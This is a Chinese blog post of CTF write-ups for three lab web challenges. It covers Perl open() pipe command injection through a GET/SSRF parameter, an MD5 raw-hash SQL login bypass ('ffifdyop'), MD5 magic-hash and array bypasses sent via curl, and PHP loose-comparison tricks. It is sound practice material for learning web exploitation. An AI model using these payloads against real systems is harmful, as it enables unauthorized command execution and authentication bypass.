hitcon_2017_ssrfme、[BJDCTF2020]Easy MD5、[极客大挑战 2019]BuyFlag

于 2023-04-19 19:27:09 发布
阅读量651 收藏 1
点赞数
分类专栏: ctf刷题纪 文章标签: php perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/130251061
版权
hitcon_2017_ssrfme

进入环境给出源码

<?php 
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) 
    {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }
    echo $_SERVER["REMOTE_ADDR"];
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__); 

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

这里GET一开始确实不知道有什么用,以为是get传参,但是想想又不明白,根据题解的意思应该是perl中的——一种语言

根据题解,GET应该是可以读文件的,那我在kali中试一试

在这里插入图片描述

创建一个flag文件并读取

echo flag{} > flag
GET ./flag

在这里插入图片描述

读取根目录

在这里插入图片描述

代码一开始创建了一个沙盒文件夹,路径为sandbox/加上MD5加密过后的orange加页面输出的ip

在这里插入图片描述

使用上面方法我们就可以在靶机里找flag了,一般flag在根目录下,payload

http://8e43eaf3-33d8-4fae-9336-4977010900a2.node4.buuoj.cn:81/?url=/&filename=233
http://8e43eaf3-33d8-4fae-9336-4977010900a2.node4.buuoj.cn:81/sandbox/230317844a87b41e353b096d0d6a5145/233

在这里插入图片描述

有flag和readflag但是flag读不到,多半是没有权限,只能通过readflag来实现了

GET底层实现使用的是open函数,open函数可以执行命令,我们可以通过GET来执行命令

1、open命令执行(|没搞明白)

open(FD,'|id')
print <FD>

而perl里的GET函数底层就是调用了open处理,如下84与132行

file.pm
84: opendir(D, $path) or
132:    open(F, $path) or return new

当GET使用file协议的时候就会调用到perl的open函数

在这里插入图片描述

发现了这一点我们就可以构造payload了

?url=&filename=|/readflag
?url=file:|/readflag&filename=abc
http://8e43eaf3-33d8-4fae-9336-4977010900a2.node4.buuoj.cn:81/sandbox/230317844a87b41e353b096d0d6a5145/abc

这样就能获得flag

在这里插入图片描述

[BJDCTF2020]Easy MD5

进入环境用浏览器自带的开发者工具抓一下包,发现头部有提示

在这里插入图片描述

这里查一下md5函数,当存在参数true时,使用原始16字符二进制格式,找到ffifdyop字符串经过MD5哈希之后,会变成276f722736c95d99e921722cf9ed621c,mysql会把hex当作Ascii码来解释所以这几个字符相当于:’ or '6xxxxxxx。这就相当于一个万能密码了我们来试试

成功登入然后我们查看网页源码

在这里插入图片描述

得到一些新的提示这就很明显是一个md5弱类型比较,我们到网上找一些以0e开头的md5值

在这里插入图片描述

用上图任意俩个值分别别传给a和b(通过get方式)给出如下payload

?a=QNKCDZO&b=240610708

然后又得到部分源码

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

在这里需要通过Post方式传入两个值,并且这两个值要求不相等且md5加密后要全等,这就又有个矛盾了,这里有嘚用一次md5弱类型比较,给这俩个值当成数组赋值这样一来就能成功绕过(如果这里不懂md5弱类型比较建议百度一下

我这里使用curl传送payload

curl -d "param1[]=1&param2[]=2" -s "http://5d01309a-5251-4791-b9b3-ee9c1facee0e.node4.buuoj.cn:81/levell14.php"

成功取得flag

在这里插入图片描述

[极客大挑战 2019]BuyFlag

进入环境点击menu后点击payflag然后我们查看网页源代码发现一些提示

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

需要post传入一个password我们既要password不能为数字且password需要为404,但是在这里我们看见比较符号为==所以这里可以使用弱类型绕过我们传入404b即可绕过过滤

在这里我们用bp抓完包我们注意这里需要更改

在这里插入图片描述

默认这里是0我们需要改为1

在这里插入图片描述

password传入值,但是发包回显钱不够

在这里插入图片描述

这里可以猜测一下钱的变量为money我们尝试更改钱的数量

在这里插入图片描述

在这里插入图片描述

数字太长我们尝试一下科学计数法

在这里插入图片描述

在这里插入图片描述

这样我们就能获得flag

听门外雪花飞
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 615
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
【BUUCTF】刷题总结(基础篇)
weixin_51614272的博客
05-15 2217
目录[GXYCTF2019]Ping Ping Ping[挑战 2019]Upload[挑战 2019]BabySQL[ACTF2020 新生赛]Upload[挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
关于BMZCTF hitcon_2017_ssrfme的解法
永远是少年
01-12 840
在BMZCTF中,有一道题是hitcon_2017_ssrfme
BMZCTF:hitcon_2017_ssrfme
末初的CSDN博客
01-25 725
http://bmzclub.cn/challenges#hitcon_2017_ssrfme <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pat
[HITCON 2017]SSRFme
Yb_140的博客
11-21 171
暂无,等待添加
hitcon_2017_ssrfme
o3Ev的博客
05-02 380
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
BMZCTF——web(hitcon_2017_ssrfme
LizePing_的博客
07-09 248
BMZCTF——webhitcon_2017_ssrfme解题思路法尔??解题思路 所有题目wp都经过实践。可放心食用。 hitcon_2017_ssrfme 解题思路 打开题目,看到下面代码,尝试了解所表达的意思。 定义一个变量sandbox,沙箱。路径则是在字符串orange加上所访问的ip地址,php使用$_SERVER[“REMOTE_ADDR”]获取访问IP地址(浏览器输入ip就能看到)。 可以先测试一波,url随便写,再加上条件文件名 构造payload:?url=1&filena
[BMZCTF]-hitcon_2017_ssrfme
cjdgg的博客
05-23 170
[BMZCTF]-hitcon_2017_ssrfme 依旧是直接给出题目源代码 这里列一下几个用到的函数吧 file_put_contents — 将一个字符串写入文件 pathinfo — 返回文件路径的信息 escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 这题代码简而言之就是会先生成一个文件夹,路径是orange+你的ip地址经过MD5加密后的密文,所以实际位置就是
HITCON_CMT_2017_pwn200
Starr
03-22 1973
文章目录1. 基本信息反汇编思路3. 调试4. exp源码 文件下载 1. 基本信息 file: $ file HITCON_CMT_2017_pwn200 HITCON_CMT_2017_pwn200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=57aa663
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
此外,她们还举办CTF竞赛作为选拔新成员的方式,通过解题挑战来吸引和培养有兴趣的人才。社区还参与国际会议,如在HITB(黑大会)上举办Wargame和Smart Contract Challenge,并参加了DEFCON等大型安全活动,进一步...
台灣駭年會 HITCON CMT 2017 - 安全技术资料汇总(共3份).zip
02-06
Breaking_into_the_iCloud_Keychain.pdf CSCS_以技術力協助公民社會的初次嘗試.pdf 臺灣資安人才教育_Cybersecurity_Education_in_Taiwan.pdf
HITCON 2019PPT汇总(17份).zip
01-03
'Duplicate Paths Attack - Get Elevated Privilege from Forged Identities.pdf', 'Finding Treasures in the ToyBox.pdf', 'Fuzzing AOSP for Non-crash bugs.pdf', 'HITCON Badge 2019 秘辛:MCU ARM TrustZone ...
一道简单的流量分析
weixin_52268949的博客
11-22 5622
流量附件提取 链接:https://pan.baidu.com/s/1oHSbIFiqs6ENmqykzFkEKg 提取码:do7s 1、 使用Wireshark查看并分析attack.pcapng数据包文件,通过分析数据包attack.pcapng找出黑的IP地址,并将黑的IP地址作为FLAG(形式:[IP地址])提交: 我们使用http.request.method == GET这个方法来过滤一下GET请求包 发现两个登录页面的请求包一个是172.16.1.10向172.16.1.101发出的请
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2352
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
[GXYCTF2019]Ping Ping Ping
weixin_52268949的博客
02-07 2308
[GXYCTF2019]Ping Ping Ping 进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令 发现flag.php可惜不能直接cat flag.php估计绊掉了,那我们cat index.php看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了 ?ip=127.0.0.1;cat$IFS$9index.php 源码如下 /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo pr
一道关于压缩包的ctf题目(包括暴力破解,明文攻击,伪加密)
weixin_52268949的博客
01-27 2191
关于题目附件 链接:https://pan.baidu.com/s/1PRshlizSndkgxkslnqJrHA 提取码:p76e zip三连击 下载附件得到题目 手机号码一般是11位,那么我们设置暴力破解范围为19900000000-19999999999,破解得到密码 在第一个压缩包成功解压后我们又得到提示 这时我们去看加密压缩包和已经解密的压缩包的crc 意外发现readme.txt的crc竟然相同,那么我们可以采用明文攻击 等待明文爆破完毕将压缩包保存即可获得不需要密码的压缩包,然后这题
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值